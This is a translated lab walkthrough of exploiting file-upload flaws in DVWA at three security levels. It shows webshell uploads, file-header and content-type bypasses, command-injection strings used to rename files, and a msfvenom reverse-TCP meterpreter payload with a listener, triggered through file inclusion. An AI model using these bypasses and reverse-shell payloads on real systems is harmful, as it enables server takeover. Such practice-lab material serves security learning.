Preface
File upload vulnerabilities are usually caused by the lack of strict filtering and inspection on the type and content of uploaded files, allowing attackers to obtain the webshell permissions of the server through uploading Trojan horses. Therefore, the harm caused by file upload vulnerabilities is often devastating. Apache , Tomcat, Nginx, etc. have all exposed file upload vulnerabilities
There are restrictions on the use of file upload vulnerabilities. First of all, of course, the Trojan horse file must be successfully uploaded. Second, the uploaded file must be able to be executed. Finally, the path of the uploaded file must be known.
The shooting range I tested is an all-round shooting range built with docker-compose through the centos7 system. The shooting range environment is different, and the tools used may not be able to connect. I hope everyone can understand, thank you
LOW level exploit
1. Edit a sentence Trojan q.php
2. Upload
3. Connect with a chopper
Specify the connection directory as http://192.168.5.199/hackable/uploads/q.php, the parameter is cmd, and the type is PHP(eval)
4. Double-click the newly added entry
5. Get access permissions to the target site directory
Medium level
The Medium-level code limits the type and size of uploaded files. The content-type must be jpeg or png, and the size cannot exceed 100000B (about 97.6KB)
First capture the package and modify the file type
One sentence Trojan is not affected by size restrictions
1. Change the name of q.php with the above Low level to w.png (here you can change it to jpeg or png)
2. Upload w.png and turn on packet capture
3. Modify the suffix of the uploaded file (change w.png to w.php) and click the forward button to upload
4. Upload successfully
5. Connect with a kitchen knife
Specify the connection directory http://192.168.5.199/hackable/uploads/w.php, the parameter is cmd, and the type is PHP(eval)
High level
The high-level code reads the last character string (file suffix name) in the file name, and expects to limit the file type by the file name, so the upload file name must be in the form of *.jpg, .jpeg or .png . At the same time, the getimagesize function restricts the file header of the uploaded file to be an image type
What is the file header?
The file header is a section of data at the beginning of the file that undertakes a certain task, usually at the beginning
The file header is to describe some important attributes of a file. The file header tells the program that opens and processes the file these attributes
File header of common files (hexadecimal):
JPEG (jpg), file header: FFD8FF
PNG (png), file header: 89504E47
GIF (gif), file header: 47494638
HTML (html), file header: 68746D6C3E
MS Word/Excel (xls.or.doc), file header: D0CF11E0
Quicken (qdf), file header: AC9EBD8F
ZIP Archive (zip), file header: 504B0304
RAR Archive (rar), file header: 52617221
Executable file (EXE), file header: MZ
There are several methods here, let me illustrate one by one
(1): Hide the Trojan in the picture and bypass (High file upload + Low command injection)
1. First change the image Trojan w.png used by medium to c.php
and use the copy command to merge the Trojan file c.php and the image file e.png into t.png
Copy e.png/b+c.php/a t.png
As you can see, a word Trojan horse is added to the end of the picture
2. Upload successfully
3. Select Command Injection
4. Use command injection to view the directory
127.0.0.1|ls …/…/hackable/uploads
6. Then enter the following commands through command injection to change the file suffix
127.0.0.1|mv …/…/hackable/uploads/t.png …/…/hackable/uploads/t.php
7. Then just serve the kitchen knife
(Since the router is turned off once, the IP address here has changed, don’t worry here, the operation is the same as the previous Low level)
Specify the connection directory http://192.168.5.129/hackable/uploads/t.php, the parameter is cmd, and the type is PHP(eval)
(2): GIF89a is added to the image Trojan with PHP code generated by msfvenom; image fraud header bypass (High file upload + Low file included)
Note: (Test on Kali)
1. First use msfvenom to generate a PNG image Trojan in PHP language
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.5.214 lport=3333 >> any.png
2. Upload picture Trojan
3. Upload failed
The error message in English is: Your image has not been uploaded, we can only accept JPEG or PNG images.
4. Then we use the VIM editor (the editor is not limited here) to add a code GIF89a to the head of the sam.png picture Trojan;
5. Upload the picture successfully again
6. Enter msfconsole in the terminal to enter the console
7. Then enter the following command
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 3333
set lhost 192.168.5.214
exploit
8. Then select the Low level file contains
10. Enter the following address in the address bar and press Enter
192.168.5.129/vulnerabilities/fi/?page=…/…/hackable/uploads/any.png
11. The msfconsole console will generate a session
12. Then we use the command to check what files are in the /hackable/uploads directory
13. Then I will test it and try to delete a file at random to see if there is permission. The test is successful
(3): Hide the Trojan in the picture and bypass it (High file upload + Low level file included)
1. First use a txt text, enter the GIF89a;
image fraud header and a sentence PHP Trojan horse, and then change the suffix name to 00.jpg
2. Upload file 00.jpg
3. Change the security level to Low
4. Select the file to include and enter it in the address bar, but don’t press enter first!!!
http://192.168.5.129/vulnerabilities/fi/?page=…/…/hackable/uploads/00.jpg
5. Open burpsuite for packet capture. Please pay attention here. Click the button to open the packet capture button and don't close it in a hurry! ! !
Copy the cookie line
6. Open the kitchen knife
Specify the connection directory http://192.168.5.129/vulnerabilities/fi/?page=…/…/hackable/uploads/00.jpg The parameter is cmd, the type is PHP (eval), and the character encoding is GB2312
7. Right-click the other blank space of the kitchen knife and click Settings
8. Set the request header, copy the Cookie value that appeared in the burpsuite packet capture, and operate according to the numerical order in the figure
9. Double-click the newly added entry
10. Obtain access to the target site directory
11. I found that the 00.jpg file I just uploaded is in it, and then test whether I have permission to delete the file. I just deleted a file for testing and it succeeded.